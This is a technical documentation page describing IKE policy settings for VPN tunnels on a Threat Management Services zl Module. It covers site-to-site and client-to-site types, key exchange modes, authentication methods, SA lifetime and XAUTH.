About IKE Policies

IKE is a method for negotiating the authentication keys of a VPN tunnel. Using IKE policies to negotiate the keys is more secure because the keys are randomly generated and periodically changed. Using IKE is also much easier than manual keying because the process is largely automated.

You configure the following parameters for each IKE policy:

IKE Policy Types

  • Site-to-Site (Initiator & Responder) — Two permanent VPN gateways form the ends of the VPN tunnel; commonly used between a main office and branch offices. Either gateway can initiate the VPN.

  • Client-to-Site (Responder) — A remote VPN client contacts a VPN gateway; commonly used between a corporate network and an employee who is on the road or at home. Only the remote VPN client initiates the VPN.

Gateways

  • Local — An IP address that the other gateway or client can reach. If the local gateway is behind a NAT device, it should be the public address.

  • Remote — The IP address that the local gateway can reach. If the remote client or gateway is behind a NAT device, it should be the public address. This parameter is configured only for site-to-site VPNs.

Identifiers

Each gateway has an identifier that it uses to authenticate itself. The ID can be an IP address (it must be the same as the gateway), an FQDN, an email address, or a DN Distinguished Name (only if you're using an RSA Rivest-Shamir-Adleman or DSA Digital Signature Algorithm signature as the authentication method).

Key Exchange Mode

  • Main — The exchange involves six message exchanges between the hosts.

  • Aggressive — The six exchanges are compressed into three message exchanges. It is faster than main mode but less secure because it requires hosts to send identifying information before exchanges are encrypted.

Authentication Method

  • Preshared Key — The same key is manually configured on each end of the VPN tunnel.

  • RSA or DSA Signature — Encryption methods use certificates that have been issued by a CA Certificate Authority.

SA Lifetime

The amount of time that elapses before an SA expires.

XAUTH eXtended AUTHentication

An optional, additional layer of authentication for the IKE SA. In client-to-site VPNs, the Threat Management Services (TMS) zl Module is configured as an XAUTH server, and in site-to-site VPNs, the module is configured as an XAUTH client.